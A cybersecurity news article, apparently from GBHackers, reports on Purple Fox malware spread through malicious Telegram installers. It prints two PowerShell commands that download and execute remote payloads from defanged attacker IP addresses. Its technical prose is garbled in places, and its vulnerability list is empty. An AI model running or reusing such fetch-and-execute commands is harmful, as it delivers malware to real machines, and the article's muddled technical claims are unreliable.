Thursday, December 5, 2024
Homecyber securityMalicious Telegram Messenger App Using New Purple Fox Malware to Hack PCs

Malicious Telegram Messenger App Using New Purple Fox Malware to Hack PCs

Published on

SIEM as a Service

The cybersecurity experts at Trend Micro have found a very suspicious activity of Purple Fox operators. This Purple Fox malware installs further malicious payloads on all the devices that are already infected or compromised.

The threat actors have noticed that the attacks generally take advantage of legitimate software for implementing malicious payloads. The vulnerability has been named CVE-2021-1732, and this vulnerability generally optimizes rootkit capabilities that are leveraged in their attacks.

Capabilities & Technical Analysis

In this attack, the threat actors have implemented some commands such as:-

- Advertisement - SIEM as a Service
  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png”
  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//117.187.136.141[:]13405/57BC9B7E.Png’);MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png”

However, this kind of command helps the threat actor to download some malicious payloads in the affected devices that have been hosted on several compromised servers. 

The PurpleFox servers have been founded on some locations that we have mentioned below:-

  • China – 345
  • India – 34
  • Brazil – 29
  • The United States – 26
  • Others – 113

Targeted vulnerabilities

The vulnerabilities that are targeted or exploited:-

Files dropped

The cybersecurity experts have found some files that have been dropped onto the infected system:

  • Calldriver.exe
  • Driver.sys
  • dll.dll
  • kill.bat
  • speedmem2.hg 

Second & Third Exchange (Victim to C&C)

However, in the second key exchange, it has been noted that the messages are sent from the severe to the infected device of the client, and all of these were handled on the onReceive function.

In the third exchange, once the encrypted session is designated over the WebSocket, now the users have to put their fingerprint on the machine.

And all of this is done by extracting some definite information such as:-

  • Machine name
  • Local IP
  • MCA address
  • Windows version

This type of attack is quite hazardous and has a lot of impact on the infected device. After investigating the whole attack, the cybersecurity detected a large number of malicious installers that kept delivering the same Purple Fox rootkit version.

And threat actors do this by using a similar attack chain, and not only that even they also deliver emails through email; on the other side, there are some that have been suspected to be downloaded from phishing websites. 

So, as a recommendation, the client must stay alerted by this kind of attack as it puta a huge impact on the affected devices.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

HCL DevOps Deploy / Launch Vulnerability Let Embed arbitrary HTML tags

Recently identified by security researchers, a new vulnerability in HCL DevOps Deploy and HCL...

CISA Warns of Zyxel Firewalls, CyberPanel, North Grid, & ProjectSend Flaws Exploited in Wild

The Cybersecurity and Infrastructure Security Agency (CISA) has issued warnings about several vulnerabilities being...

HackSynth : Autonomous Pentesting Framework For Simulating Cyberattacks

HackSynth is an autonomous penetration testing agent that leverages Large Language Models (LLMs) to...

Fuji Electric Indonesia Hit by Ransomware Attack

Fuji Electric Indonesia has fallen victim to a ransomware attack, impacting its operations and...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

Deloitte UK Hacked – Brain Cipher Group Claim to Have Stolen 1 TB of Data

Brain Cipher has claimed to have breached Deloitte UK and exfiltrated over 1 terabyte...

Weaponized Word Documents Attacking Windows Users to Deliver NetSupport & BurnsRAT

The threat actors distributed malicious JS scripts disguised as legitimate business documents, primarily in...

ElizaRAT Exploits Google, Telegram, & Slack Services For C2 Communications

APT36, a Pakistani cyber-espionage group, has recently upgraded its arsenal with ElizaRAT, a sophisticated...